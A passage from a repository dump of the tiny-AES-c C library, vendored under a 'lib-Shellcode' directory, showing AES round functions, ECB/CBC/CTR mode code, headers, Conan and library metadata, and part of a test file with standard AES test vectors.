| int i; 353 | uint8_t a, b, c, d; 354 | for (i = 0; i < 4; ++i) 355 | { 356 | a = (*state)[i][0]; 357 | b = (*state)[i][1]; 358 | c = (*state)[i][2]; 359 | d = (*state)[i][3]; 360 | 361 | (*state)[i][0] = Multiply(a, 0x0e) ^ Multiply(b, 0x0b) ^ Multiply(c, 0x0d) ^ Multiply(d, 0x09); 362 | (*state)[i][1] = Multiply(a, 0x09) ^ Multiply(b, 0x0e) ^ Multiply(c, 0x0b) ^ Multiply(d, 0x0d); 363 | (*state)[i][2] = Multiply(a, 0x0d) ^ Multiply(b, 0x09) ^ Multiply(c, 0x0e) ^ Multiply(d, 0x0b); 364 | (*state)[i][3] = Multiply(a, 0x0b) ^ Multiply(b, 0x0d) ^ Multiply(c, 0x09) ^ Multiply(d, 0x0e); 365 | } 366 | } 367 | 368 | 369 | // The SubBytes Function Substitutes the values in the 370 | // state matrix with values in an S-box. 371 | static void InvSubBytes(state_t* state) 372 | { 373 | uint8_t i, j; 374 | for (i = 0; i < 4; ++i) 375 | { 376 | for (j = 0; j < 4; ++j) 377 | { 378 | (*state)[j][i] = getSBoxInvert((*state)[j][i]); 379 | } 380 | } 381 | } 382 | 383 | static void InvShiftRows(state_t* state) 384 | { 385 | uint8_t temp; 386 | 387 | // Rotate first row 1 columns to right 388 | temp = (*state)[3][1]; 389 | (*state)[3][1] = (*state)[2][1]; 390 | (*state)[2][1] = (*state)[1][1]; 391 | (*state)[1][1] = (*state)[0][1]; 392 | (*state)[0][1] = temp; 393 | 394 | // Rotate second row 2 columns to right 395 | temp = (*state)[0][2]; 396 | (*state)[0][2] = (*state)[2][2]; 397 | (*state)[2][2] = temp; 398 | 399 | temp = (*state)[1][2]; 400 | (*state)[1][2] = (*state)[3][2]; 401 | (*state)[3][2] = temp; 402 | 403 | // Rotate third row 3 columns to right 404 | temp = (*state)[0][3]; 405 | (*state)[0][3] = (*state)[1][3]; 406 | (*state)[1][3] = (*state)[2][3]; 407 | (*state)[2][3] = (*state)[3][3]; 408 | (*state)[3][3] = temp; 409 | } 410 | #endif // #if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1) 411 | 412 | // Cipher is the main function that encrypts the PlainText. 413 | static void Cipher(state_t* state, const uint8_t* RoundKey) 414 | { 415 | uint8_t round = 0; 416 | 417 | // Add the First round key to the state before starting the rounds. 418 | AddRoundKey(0, state, RoundKey); 419 | 420 | // There will be Nr rounds. 421 | // The first Nr-1 rounds are identical. 422 | // These Nr rounds are executed in the loop below. 423 | // Last one without MixColumns() 424 | for (round = 1; ; ++round) 425 | { 426 | SubBytes(state); 427 | ShiftRows(state); 428 | if (round == Nr) { 429 | break; 430 | } 431 | MixColumns(state); 432 | AddRoundKey(round, state, RoundKey); 433 | } 434 | // Add round key to last round 435 | AddRoundKey(Nr, state, RoundKey); 436 | } 437 | 438 | #if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1) 439 | static void InvCipher(state_t* state, const uint8_t* RoundKey) 440 | { 441 | uint8_t round = 0; 442 | 443 | // Add the First round key to the state before starting the rounds. 444 | AddRoundKey(Nr, state, RoundKey); 445 | 446 | // There will be Nr rounds. 447 | // The first Nr-1 rounds are identical. 448 | // These Nr rounds are executed in the loop below. 449 | // Last one without InvMixColumn() 450 | for (round = (Nr - 1); ; --round) 451 | { 452 | InvShiftRows(state); 453 | InvSubBytes(state); 454 | AddRoundKey(round, state, RoundKey); 455 | if (round == 0) { 456 | break; 457 | } 458 | InvMixColumns(state); 459 | } 460 | 461 | } 462 | #endif // #if (defined(CBC) && CBC == 1) || (defined(ECB) && ECB == 1) 463 | 464 | /*****************************************************************************/ 465 | /* Public functions: */ 466 | /*****************************************************************************/ 467 | #if defined(ECB) && (ECB == 1) 468 | 469 | 470 | void AES_ECB_encrypt(const struct AES_ctx* ctx, uint8_t* buf) 471 | { 472 | // The next function call encrypts the PlainText with the Key using AES algorithm. 473 | Cipher((state_t*)buf, ctx->RoundKey); 474 | } 475 | 476 | void AES_ECB_decrypt(const struct AES_ctx* ctx, uint8_t* buf) 477 | { 478 | // The next function call decrypts the PlainText with the Key using AES algorithm. 479 | InvCipher((state_t*)buf, ctx->RoundKey); 480 | } 481 | 482 | 483 | #endif // #if defined(ECB) && (ECB == 1) 484 | 485 | 486 | 487 | 488 | 489 | #if defined(CBC) && (CBC == 1) 490 | 491 | 492 | static void XorWithIv(uint8_t* buf, const uint8_t* Iv) 493 | { 494 | uint8_t i; 495 | for (i = 0; i < AES_BLOCKLEN; ++i) // The block in AES is always 128bit no matter the key size 496 | { 497 | buf[i] ^= Iv[i]; 498 | } 499 | } 500 | 501 | void AES_CBC_encrypt_buffer(struct AES_ctx *ctx, uint8_t* buf, size_t length) 502 | { 503 | size_t i; 504 | uint8_t *Iv = ctx->Iv; 505 | for (i = 0; i < length; i += AES_BLOCKLEN) 506 | { 507 | XorWithIv(buf, Iv); 508 | Cipher((state_t*)buf, ctx->RoundKey); 509 | Iv = buf; 510 | buf += AES_BLOCKLEN; 511 | } 512 | /* store Iv in ctx for next call */ 513 | memcpy(ctx->Iv, Iv, AES_BLOCKLEN); 514 | } 515 | 516 | void AES_CBC_decrypt_buffer(struct AES_ctx* ctx, uint8_t* buf, size_t length) 517 | { 518 | size_t i; 519 | uint8_t storeNextIv[AES_BLOCKLEN]; 520 | for (i = 0; i < length; i += AES_BLOCKLEN) 521 | { 522 | memcpy(storeNextIv, buf, AES_BLOCKLEN); 523 | InvCipher((state_t*)buf, ctx->RoundKey); 524 | XorWithIv(buf, ctx->Iv); 525 | memcpy(ctx->Iv, storeNextIv, AES_BLOCKLEN); 526 | buf += AES_BLOCKLEN; 527 | } 528 | 529 | } 530 | 531 | #endif // #if defined(CBC) && (CBC == 1) 532 | 533 | 534 | 535 | #if defined(CTR) && (CTR == 1) 536 | 537 | /* Symmetrical operation: same function for encrypting as for decrypting. Note any IV/nonce should never be reused with the same key */ 538 | void AES_CTR_xcrypt_buffer(struct AES_ctx* ctx, uint8_t* buf, size_t length) 539 | { 540 | uint8_t buffer[AES_BLOCKLEN]; 541 | 542 | size_t i; 543 | int bi; 544 | for (i = 0, bi = AES_BLOCKLEN; i < length; ++i, ++bi) 545 | { 546 | if (bi == AES_BLOCKLEN) /* we need to regen xor compliment in buffer */ 547 | { 548 | 549 | memcpy(buffer, ctx->Iv, AES_BLOCKLEN); 550 | Cipher((state_t*)buffer,ctx->RoundKey); 551 | 552 | /* Increment Iv and handle overflow */ 553 | for (bi = (AES_BLOCKLEN - 1); bi >= 0; --bi) 554 | { 555 | /* inc will overflow */ 556 | if (ctx->Iv[bi] == 255) 557 | { 558 | ctx->Iv[bi] = 0; 559 | continue; 560 | } 561 | ctx->Iv[bi] += 1; 562 | break; 563 | } 564 | bi = 0; 565 | } 566 | 567 | buf[i] = (buf[i] ^ buffer[bi]); 568 | } 569 | } 570 | 571 | #endif // #if defined(CTR) && (CTR == 1) 572 | 573 | -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/aes.h: -------------------------------------------------------------------------------- 1 | #ifndef _AES_H_ 2 | #define _AES_H_ 3 | 4 | #include 5 | #include 6 | 7 | // #define the macros below to 1/0 to enable/disable the mode of operation. 8 | // 9 | // CBC enables AES encryption in CBC-mode of operation. 10 | // CTR enables encryption in counter-mode. 11 | // ECB enables the basic ECB 16-byte block algorithm. All can be enabled simultaneously. 12 | 13 | // The #ifndef-guard allows it to be configured before #include'ing or at compile time. 14 | #ifndef CBC 15 | #define CBC 1 16 | #endif 17 | 18 | #ifndef ECB 19 | #define ECB 1 20 | #endif 21 | 22 | #ifndef CTR 23 | #define CTR 1 24 | #endif 25 | 26 | 27 | #define AES128 1 28 | //#define AES192 1 29 | //#define AES256 1 30 | 31 | #define AES_BLOCKLEN 16 // Block length in bytes - AES is 128b block only 32 | 33 | #if defined(AES256) && (AES256 == 1) 34 | #define AES_KEYLEN 32 35 | #define AES_keyExpSize 240 36 | #elif defined(AES192) && (AES192 == 1) 37 | #define AES_KEYLEN 24 38 | #define AES_keyExpSize 208 39 | #else 40 | #define AES_KEYLEN 16 // Key length in bytes 41 | #define AES_keyExpSize 176 42 | #endif 43 | 44 | struct AES_ctx 45 | { 46 | uint8_t RoundKey[AES_keyExpSize]; 47 | #if (defined(CBC) && (CBC == 1)) || (defined(CTR) && (CTR == 1)) 48 | uint8_t Iv[AES_BLOCKLEN]; 49 | #endif 50 | }; 51 | 52 | void AES_init_ctx(struct AES_ctx* ctx, const uint8_t* key); 53 | #if (defined(CBC) && (CBC == 1)) || (defined(CTR) && (CTR == 1)) 54 | void AES_init_ctx_iv(struct AES_ctx* ctx, const uint8_t* key, const uint8_t* iv); 55 | void AES_ctx_set_iv(struct AES_ctx* ctx, const uint8_t* iv); 56 | #endif 57 | 58 | #if defined(ECB) && (ECB == 1) 59 | // buffer size is exactly AES_BLOCKLEN bytes; 60 | // you need only AES_init_ctx as IV is not used in ECB 61 | // NB: ECB is considered insecure for most uses 62 | void AES_ECB_encrypt(const struct AES_ctx* ctx, uint8_t* buf); 63 | void AES_ECB_decrypt(const struct AES_ctx* ctx, uint8_t* buf); 64 | 65 | #endif // #if defined(ECB) && (ECB == !) 66 | 67 | 68 | #if defined(CBC) && (CBC == 1) 69 | // buffer size MUST be mutile of AES_BLOCKLEN; 70 | // Suggest https://en.wikipedia.org/wiki/Padding_(cryptography)#PKCS7 for padding scheme 71 | // NOTES: you need to set IV in ctx via AES_init_ctx_iv() or AES_ctx_set_iv() 72 | // no IV should ever be reused with the same key 73 | void AES_CBC_encrypt_buffer(struct AES_ctx* ctx, uint8_t* buf, size_t length); 74 | void AES_CBC_decrypt_buffer(struct AES_ctx* ctx, uint8_t* buf, size_t length); 75 | 76 | #endif // #if defined(CBC) && (CBC == 1) 77 | 78 | 79 | #if defined(CTR) && (CTR == 1) 80 | 81 | // Same function for encrypting as for decrypting. 82 | // IV is incremented for every block, and used after encryption as XOR-compliment for output 83 | // Suggesting https://en.wikipedia.org/wiki/Padding_(cryptography)#PKCS7 for padding scheme 84 | // NOTES: you need to set IV in ctx with AES_init_ctx_iv() or AES_ctx_set_iv() 85 | // no IV should ever be reused with the same key 86 | void AES_CTR_xcrypt_buffer(struct AES_ctx* ctx, uint8_t* buf, size_t length); 87 | 88 | #endif // #if defined(CTR) && (CTR == 1) 89 | 90 | 91 | #endif // _AES_H_ 92 | -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/aes.hpp: -------------------------------------------------------------------------------- 1 | #ifndef _AES_HPP_ 2 | #define _AES_HPP_ 3 | 4 | #ifndef __cplusplus 5 | #error Do not include the hpp header in a c project! 6 | #endif //__cplusplus 7 | 8 | extern "C" { 9 | #include "aes.h" 10 | } 11 | 12 | #endif //_AES_HPP_ 13 | -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/conanfile.py: -------------------------------------------------------------------------------- 1 | from conans import ConanFile, CMake 2 | from conans.errors import ConanException 3 | 4 | 5 | class TinyAesCConan(ConanFile): 6 | name = "tiny-AES-c" 7 | version = "1.0.0" 8 | license = "The Unlicense" 9 | url = "https://github.com/kokke/tiny-AES-c" 10 | description = "Small portable AES128/192/256 in C" 11 | topics = ("encryption", "crypto", "AES") 12 | settings = "os", "compiler", "build_type", "arch" 13 | 14 | generators = "cmake" 15 | exports_sources = ["CMakeLists.txt", "*.c", '*.h', '*.hpp'] 16 | exports = ["unlicense.txt"] 17 | 18 | _options_dict = { 19 | # enable AES128 20 | "AES128": [True, False], 21 | 22 | # enable AES192 23 | "AES192": [True, False], 24 | 25 | # enable AES256 26 | "AES256": [True, False], 27 | 28 | # enable AES encryption in CBC-mode of operation 29 | "CBC": [True, False], 30 | 31 | # enable the basic ECB 16-byte block algorithm 32 | "ECB": [True, False], 33 | 34 | # enable encryption in counter-mode 35 | "CTR": [True, False], 36 | } 37 | 38 | options = _options_dict 39 | 40 | default_options = { 41 | "AES128": True, 42 | "AES192": False, 43 | "AES256": False, 44 | "CBC": True, 45 | "ECB": True, 46 | "CTR": True 47 | } 48 | 49 | def configure(self): 50 | if not self.options.CBC and not self.options.ECB and not self.options.CTR: 51 | raise ConanException("Need to at least specify one of CBC, ECB or CTR modes") 52 | 53 | if not self.options.AES128 and not self.options.AES192 and not self.options.AES256: 54 | raise ConanException("Need to at least specify one of AES{128, 192, 256} modes") 55 | 56 | def build(self): 57 | cmake = CMake(self) 58 | 59 | for key in self._options_dict.keys(): 60 | if self.options[key]: 61 | cmake.definitions["CMAKE_CFLAGS"].append(key) 62 | 63 | cmake.configure() 64 | cmake.build() 65 | 66 | def package(self): 67 | self.copy("*.h", dst="include") 68 | self.copy("*.hpp", dst="include") 69 | self.copy("*.a", dst="lib", keep_path=False) 70 | self.copy("unlicense.txt") 71 | 72 | def package_info(self): 73 | self.cpp_info.libs = ["tiny-aes"] 74 | -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/library.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": "1.0.0", 3 | "name": "tiny-AES-c", 4 | "keywords": "cryptography, aes", 5 | "description": "Small portable AES128/192/256 in C", 6 | "repository": 7 | { 8 | "type": "git", 9 | "branch": "master", 10 | "url": "https://github.com/kokke/tiny-AES-c.git" 11 | }, 12 | "frameworks": "*", 13 | "platforms": "*", 14 | "examples": "test.c", 15 | "build": 16 | { 17 | "srcFilter": "+<*> -<.git/> - - -" 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/library.properties: -------------------------------------------------------------------------------- 1 | name=tiny-AES-c 2 | version=1.0.0 3 | author=kokke 4 | maintainer=kokke 5 | sentence=A small and portable implementation of the AES ECB, CTR and CBC encryption algorithms written in C. 6 | paragraph=You can override the default key-size of 128 bit with 192 or 256 bit by defining the symbols AES192 or AES256 in aes.h. The API is very simple. No padding is provided so for CBC and ECB all buffers should be multiples of 16 bytes. 7 | category=Data Processing 8 | url=https://github.com/kokke/tiny-AES-c 9 | repository=https://github.com/kokke/tiny-AES-c.git 10 | architectures=* 11 | includes=aes.h 12 | -------------------------------------------------------------------------------- /lib-Shellcode/tiny-AES-c/test.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // Enable ECB, CTR and CBC mode. Note this can be done before including aes.h or at compile-time. 6 | // E.g. with GCC by using the -D flag: gcc -c aes.c -DCBC=0 -DCTR=1 -DECB=1 7 | #define CBC 1 8 | #define CTR 1 9 | #define ECB 1 10 | 11 | #include "aes.h" 12 | 13 | 14 | static void phex(uint8_t* str); 15 | static int test_encrypt_cbc(void); 16 | static int test_decrypt_cbc(void); 17 | static int test_encrypt_ctr(void); 18 | static int test_decrypt_ctr(void); 19 | static int test_encrypt_ecb(void); 20 | static int test_decrypt_ecb(void); 21 | static void test_encrypt_ecb_verbose(void); 22 | 23 | 24 | int main(void) 25 | { 26 | int exit; 27 | 28 | #if defined(AES256) 29 | printf("\nTesting AES256\n\n"); 30 | #elif defined(AES192) 31 | printf("\nTesting AES192\n\n"); 32 | #elif defined(AES128) 33 | printf("\nTesting AES128\n\n"); 34 | #else 35 | printf("You need to specify a symbol between AES128, AES192 or AES256. Exiting"); 36 | return 0; 37 | #endif 38 | 39 | exit = test_encrypt_cbc() + test_decrypt_cbc() + 40 | test_encrypt_ctr() + test_decrypt_ctr() + 41 | test_decrypt_ecb() + test_encrypt_ecb(); 42 | test_encrypt_ecb_verbose(); 43 | 44 | return exit; 45 | } 46 | 47 | 48 | // prints string as hex 49 | static void phex(uint8_t* str) 50 | { 51 | 52 | #if defined(AES256) 53 | uint8_t len = 32; 54 | #elif defined(AES192) 55 | uint8_t len = 24; 56 | #elif defined(AES128) 57 | uint8_t len = 16; 58 | #endif 59 | 60 | unsigned char i; 61 | for (i = 0; i < len; ++i) 62 | printf("%.2x", str[i]); 63 | printf("\n"); 64 | } 65 | 66 | static void test_encrypt_ecb_verbose(void) 67 | { 68 | // Example of more verbose verification 69 | 70 | uint8_t i; 71 | 72 | // 128bit key 73 | uint8_t key[16] = { (uint8_t) 0x2b, (uint8_t) 0x7e, (uint8_t) 0x15, (uint8_t) 0x16, (uint8_t) 0x28, (uint8_t) 0xae, (uint8_t) 0xd2, (uint8_t) 0xa6, (uint8_t) 0xab, (uint8_t) 0xf7, (uint8_t) 0x15, (uint8_t) 0x88, (uint8_t) 0x09, (uint8_t) 0xcf, (uint8_t) 0x4f, (uint8_t) 0x3c }; 74 | // 512bit text 75 | uint8_t plain_text[64] = { (uint8_t) 0x6b, (uint8_t) 0xc1, (uint8_t) 0xbe, (uint8_t) 0xe2, (uint8_t) 0x2e, (uint8_t) 0x40, (uint8_t) 0x9f, (uint8_t) 0x96, (uint8_t) 0xe9, (uint8_t) 0x3d, (uint8_t) 0x7e, (uint8_t) 0x11, (uint8_t) 0x73, (uint8_t) 0x93, (uint8_t) 0x17, (uint8_t) 0x2a, 76 | (uint8_t) 0xae, (uint8_t) 0x2d, (uint8_t) 0x8a, (uint8_t) 0x57, (uint8_t) 0x1e, (uint8_t) 0x03, (uint8_t) 0xac, (uint8_t) 0x9c, (uint8_t) 0x9e, (uint8_t) 0xb7, (uint8_t) 0x6f, (uint8_t) 0xac, (uint8_t) 0x45, (uint8_t) 0xaf, (uint8_t) 0x8e, (uint8_t) 0x51, 77 | (uint8_t) 0x30, (uint8_t) 0xc8, (uint8_t) 0x1c, (uint8_t) 0x46, (uint8_t) 0xa3, (uint8_t) 0x5c, (uint8_t) 0xe4, (uint8_t) 0x11, (uint8_t) 0xe5, (uint8_t) 0xfb, (uint8_t) 0xc1, (uint8_t) 0x19, (uint8_t) 0x1a, (uint8_t) 0x0a, (uint8_t) 0x52, (uint8_t) 0xef, 78 | (uint8_t) 0xf6, (uint8_t) 0x9f, (uint8_t) 0x24, (uint8_t) 0x45, (uint8_t) 0xdf, (uint8_t) 0x4f, (uint8_t) 0x9b, (uint8_t) 0x17, (uint8_t) 0xad, (uint8_t) 0x2b, (uint8_t) 0x41, (uint8_t) 0x7b, (uint8_t) 0xe6, (uint8_t) 0x6c, (uint8_t) 0x37, (uint8_t) 0x10 }; 79 | 80 | // print text to encrypt, key and IV 81 | printf("ECB encrypt verbose:\n\n"); 82 | printf("plain text:\n"); 83 | for (i = (uint8_t) 0; i < (uint8_t) 4; ++i) 84 | { 85 | phex(plain_text + i * (uint8_t) 16); 86 | } 87 | printf("\n"); 88 | 89 | printf("key:\n"); 90 | phex(key); 91 | printf("\n"); 92 | 93 | // print the resulting cipher as 4 x 16 byte strings 94 | printf("ciphertext:\n"); 95 | 96 | struct AES_ctx ctx; 97 | AES_init_ctx(&ctx, key); 98 | 99 | for (i = 0; i < 4; ++i) 100 | { 101 | AES_ECB_encrypt(&ctx, plain_text + (i * 16)); 102 | phex(plain_text + (i * 16)); 103 | } 104 | printf("\n"); 105 | } 106 | 107 | 108 | static int test_encrypt_ecb(void) 109 | { 110 | #if defined(AES256) 111 | uint8_t key[] = { 0x60, 0x3d, 0xeb, 0x10, 0x15, 0xca, 0x71, 0xbe, 0x2b, 0x73, 0xae, 0xf0, 0x85, 0x7d, 0x77, 0x81, 112 | 0x1f, 0x35, 0x2c, 0x07, 0x3b, 0x61, 0x08, 0xd7, 0x2d, 0x98, 0x10, 0xa3, 0x09, 0x14, 0xdf, 0xf4 }; 113 | uint8_t out[] = { 0xf3, 0xee, 0xd1, 0xbd, 0xb5, 0xd2, 0xa0, 0x3c, 0x06, 0x4b, 0x5a, 0x7e, 0x3d, 0xb1, 0x81, 0xf8 }; 114 | #elif defined(AES192) 115 | uint8_t key[] = { 0x8e, 0x73, 0xb0, 0xf7, 0xda, 0x0e, 0x64, 0x52, 0xc8, 0x10, 0xf3, 0x2b, 0x80, 0x90, 0x79, 0xe5, 116 | 0x62, 0xf8, 0xea, 0xd2, 0x52, 0x2c, 0x6b, 0x7b }; 117 | uint8_t out[] = { 0xbd, 0x33, 0x4f, 0x1d, 0x6e, 0x45, 0xf2, 0x5f, 0xf7, 0x12, 0xa2, 0x14, 0x57, 0x1f, 0xa5, 0xcc }; 118 | #elif defined(AES128) 119 | uint8_t key[] = { 0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c }; 120 | uint8_t out[] = { 0x3a, 0xd7, 0x7b, 0xb4, 0x0d, 0x7a, 0x36, 0x60, 0xa8, 0x9e, 0xca, 0xf3, 0x24, 0x66, 0xef, 0x97 }; 121 | #endif 122 | 123 | uint8_t in[] = { 0x6b, 0xc1, 0xbe, 0xe2, 0x2e, 0x40, 0x9f, 0x96, 0xe9, 0x3d, 0x7e, 0x11, 0x73, 0x93, 0x17, 0x2a }; 124 | struct AES_ctx ctx; 125 | 126 | AES_init_ctx(&ctx, key); 127 | AES_ECB_encrypt(&ctx, in); 128 | 129 | printf("ECB encrypt: "); 130 | 131 | if (0 == memcmp((char*) out, (char*) in, 16)) { 132 | printf("SUCCESS!\n"); 133 | return(0); 134 | } else { 135 | printf("FAILURE!\n"); 136 | return(1); 137 | } 138 | } 139 | 140 | static int test_decrypt_cbc(void) 141 | { 142 | 143 | #if defined(AES256) 144 | uint8_t key[] = { 0x60, 0x3d, 0xeb, 0x10, 0x15, 0xca, 0x71, 0xbe, 0x2b, 0x73, 0xae, 0xf0, 0x85, 0x7d, 0x77, 0x81, 145 | 0x1f, 0x35, 0x2c, 0x07, 0x3b, 0x61, 0x08, 0xd7, 0x2d, 0x98, 0x10, 0xa3, 0x09, 0x14, 0xdf, 0xf4 }; 146 | uint8_t in[] = { 0xf5, 0x8c, 0x4c, 0x04, 0xd6, 0xe5, 0xf1, 0xba, 0x77, 0x9e, 0xab, 0xfb, 0x5f, 0x7b, 0xfb, 0xd6, 147 | 0x9c, 0xfc, 0x4e, 0x96, 0x7e, 0xdb, 0x80, 0x8d, 0x67, 0x9f, 0x77, 0x7b, 0xc6, 0x70, 0x2c, 0x7d, 148 | 0x39, 0xf2, 0x33, 0x69, 0xa9, 0xd9, 0xba, 0xcf, 0xa5, 0x30, 0xe2, 0x63, 0x04, 0x23, 0x14, 0x61, 149 | 0xb2, 0xeb, 0x05, 0xe2, 0xc3, 0x9b, 0xe9, 0xfc, 0xda, 0x6c, 0x19, 0x07, 0x8c, 0x6a, 0x9d, 0x1b }; 150 | #elif defined(AES192) 151 | uint8_t key[] = { 0x8e, 0x73, 0xb0, 0xf7, 0xda, 0x0e, 0x64, 0x52, 0xc8, 0x10, 0xf3, 0x2b, 0x80, 0x90, 0x79, 0xe5, 0x62, 0xf8, 0xea, 0xd2, 0x52, 0x2c, 0x6b, 0x7b }; 152 | uint8_t in[] = { 0x4f, 0x02, 0x1d, 0xb2, 0x43, 0xbc, 0x63, 0x3d, 0x71, 0x78, 0x18, 0x3a, 0x9f, 0xa0, 0x71, 0xe8, 153 | 0xb4, 0xd9, 0xad, 0xa9, 0xad, 0x7d, 0xed, 0xf4, 0xe5, 0xe7, 0x38, 0x76, 0x3f, 0x69, 0x14, 0x5a, 154 | 0x57, 0x1b, 0x24, 0x20, 0x12, 0xfb, 0x7a, 0xe0, 0x7f, 0xa9, 0xba, 0xac, 0x3d, 0xf1, 0x02, 0xe0, 155 | 0x08, 0xb0, 0xe2, 0x79, 0x88, 0x59, 0x88, 0x81, 0xd9, 0x20, 0xa9, 0xe6, 0x4f, 0x56, 0x15, 0xcd }; 156 | #elif defined(AES128) 157 | uint8_t key[] = { 0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c }; 158 | uint8_t in[] = { 0x76, 0x49, 0xab, 0xac, 0x81, 0x19, 0xb2, 0x46, 0xce, 0xe9, 0x8e, 0x9b, 0x12, 0xe9, 0x19, 0x7d, 159 | 0x50, 0x86, 0xcb, 0x9b, 0x50, 0x72, 0x19, 0xee, 0x95, 0xdb, 0x11, 0x3a, 0x91, 0x76, 0x78, 0xb2, 160 | 0x73, 0xbe, 0xd6, 0xb8, 0xe3, 0xc1, 0x74, 0x3b, 0x71, 0x16, 0xe6, 0x9e, 0x22, 0x22, 0x95, 0x16, 161 | 0x3f, 0xf1, 0xca, 0xa1, 0x68, 0x1f, 0xac, 0x09, 0x12, 0x0e, 0xca, 0x30, 0x75, 0x86, 0xe1, 0xa7 }; 162 | #endif 163 | uint8_t iv[] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f }; 164 | uint8_t out[] = { 0x6b, 0xc1, 0xbe, 0xe2, 0x2e, 0x40, 0x9f, 0x96, 0xe9, 0x3d, 0x7e, 0x11, 0x73, 0x93, 0x17, 0x2a, 165 | 0xae, 0x2d, 0x8a, 0x57, 0x1e, 0x03, 0xac, 0x9c, 0x9e, 0xb7, 0x6f, 0xac, 0x45, 0xaf, 0x8e, 0x51, 166 | 0x30, 0xc8, 0x1c, 0x46, 0xa3, 0x5c, 0xe4, 0x11, 0xe5, 0xfb, 0xc1, 0x19, 0x1a, 0x0a, 0x52, 0xef, 167 | 0xf6, 0x9f, 0x24, 0x45, 0xdf, 0x4f, 0x9b, 0x17, 0xad, 0x2b, 0x41, 0x7b, 0xe6, 0x6c, 0x37, 0x10 }; 168 | // uint8_t buffer[64]; 169 | struct AES_ctx ctx; 170 | 171 | AES_init_ctx_iv(&ctx, key, iv); 172 | AES_CBC_decrypt_buffer(&ctx, in, 64); 173 | 174 | printf("CBC decrypt: "); 175 | 176 | if (0 == memcmp((char*) out, (char*) in, 64)) { 177 | printf("SUCCESS!\n"); 178 | return(0); 179 | } else { 180 | printf("FAILURE!\n"); 181 | return(1); 182 | } 183 | } 184 | 185 | static int test_encrypt_cbc(void) 186 | { 187 | #if defined(AES256) 188 | uint8_t key[] = { 0x60, 0x3d, 0xeb, 0x10, 0x15, 0xca, 0x71, 0xbe, 0x2b, 0x73, 0xae, 0xf0, 0x85, 0x7d, 0x77, 0x81, 189 | 0x1f, 0x35, 0x2c, 0x07, 0x3b, 0x61, 0x08, 0xd7, 0x2d, 0x98, 0x10, 0xa3, 0x09, 0x14, 0xdf, 0xf4 }; 190 | uint8_t out[] = { 0xf5, 0x8c, 0x4c, 0x04, 0xd6, 0xe5, 0xf1, 0xba, 0x77, 0x9e, 0xab, 0xfb, 0x5f, 0x7b, 0xfb, 0xd6, 191 | 0x9c, 0xfc, 0x4e, 0x96, 0x7e, 0xdb, 0x80, 0x8d, 0x67, 0x9f, 0x77, 0x7b, 0xc6, 0x70, 0x2c, 0x7d, 192 | 0x39, 0xf2, 0x33, 0x69, 0xa9, 0xd9, 0xba, 0xcf, 0xa5, 0x30, 0xe2, 0x63, 0x04, 0x23, 0x14, 0x61, 193 | 0xb2, 0xeb, 0x05, 0xe2, 0xc3, 0x9b, 0xe9, 0xfc, 0xda, 0x6c, 0x19, 0x07, 0x8c, 0x6a, 0x9d, 0x1b }; 194 | #elif defined(AES192) 195 | uint8_t key[] = { 0x8e, 0x73, 0xb0, 0xf7, 0xda, 0x0e, 0x64, 0x52, 0xc8, 0x10, 0xf3, 0x2b, 0x80, 0x90, 0x79, 0xe5, 0x62, 0xf8, 0xea, 0xd2, 0x52, 0x2c, 0x6b, 0x7b }; 196 | uint8_t out[] = { 0x4f, 0x02, 0x1d, 0xb2, 0x43, 0xbc, 0x63, 0x3d, 0x71, 0x78, 0x18, 0x3a, 0x9f, 0xa0, 0x71, 0xe8, 197 | 0xb4, 0xd9, 0xad, 0xa9, 0xad, 0x7d, 0xed, 0xf4, 0xe5, 0xe7, 0x38, 0x76, 0x3f, 0x69, 0x14, 0x5a, 198 | 0x57, 0x1b, 0x24, 0x20, 0x12, 0xfb, 0x7a, 0xe0, 0x7f, 0xa9, 0xba, 0xac, 0x3d, 0xf1, 0x02, 0xe0, 199 | 0x08, 0xb0, 0xe2, 0x79, 0x88, 0x59, 0x88, 0x81, 0xd9, 0x20, 0xa9, 0xe6, 0x4f, 0x56, 0x15, 0xcd }; 200 | #elif defined(AES128) 201 | uint8_t key[] = { 0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c }; 202 | uint8_t out[] = { 0x76, 0x49, 0xab, 0xac, 0x81, 0x19, 0xb2, 0x46, 0xce, 0xe9, 0x8e, 0x9b, 0x12, 0xe9, 0x19, 0x7d, 203 | 0x50, 0x86, 0xcb, 0x9b, 0x50, 0x72, 0x19, 0xee, 0x95, 0xdb, 0x11, 0x3a, 0x91, 0x76, 0x78, 0xb2, 204 | 0x73, 0xbe, 0xd6, 0xb8, 0xe3, 0xc1, 0x74, 0x3b, 0x71, 0x16, 0xe6, 0x9e, 0x22, 0x22, 0x95, 0x16, 205 | 0x3f, 0xf1, 0xca, 0xa1, 0x68, 0x1f, 0xac, 0x09, 0x12, 0x0e, 0xca, 0x30, 0x75, 0x86, 0xe1, 0xa7 }; 206 | #endif 207 | uint8_t iv[] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f }; 208 | uint8_t in[] = { 0x6b, 0xc1, 0xbe, 0xe2, 0x2e, 0x40, 0x9f, 0x96, 0xe9, 0x3d, 0x7e, 0x11, 0x73, 0x93, 0x17, 0x2a, 209 | 0xae, 0x2d, 0x8a, 0x57, 0x1e, 0x03, 0xac, 0x9c, 0x9e, 0xb7, 0x6f, 0xac, 0x45, 0xaf, 0x8e, 0x51, 210 | 0x30, 